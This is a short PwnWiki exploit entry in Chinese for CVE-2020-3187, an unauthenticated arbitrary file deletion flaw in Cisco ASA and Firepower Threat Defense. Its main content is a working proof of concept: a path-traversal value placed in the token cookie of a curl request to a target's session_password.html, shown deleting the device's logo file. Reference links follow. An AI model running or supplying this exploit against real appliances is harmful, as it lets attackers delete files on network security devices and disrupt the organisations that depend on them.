Cicso未經驗證任意文件刪除漏洞 CVE-2020-3187
From PwnWiki
影響系統:
Cisco Adaptive Security Appliance
Cisco Firepower Threat Defense Software
POC:
舉例爲刪除LOGO文件:
payload:
/+CSCOU+/csco_logo.gif
執行:
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
更多:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3187
https://blog.rapid7.com/2020/05/08/may-2020-cisco-remote-vulnerabilities-guidance/
https://twitter.com/aboul3la/status/1286809567989575685 https://github.com/pry0cc/CVE-2020-3187 https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html
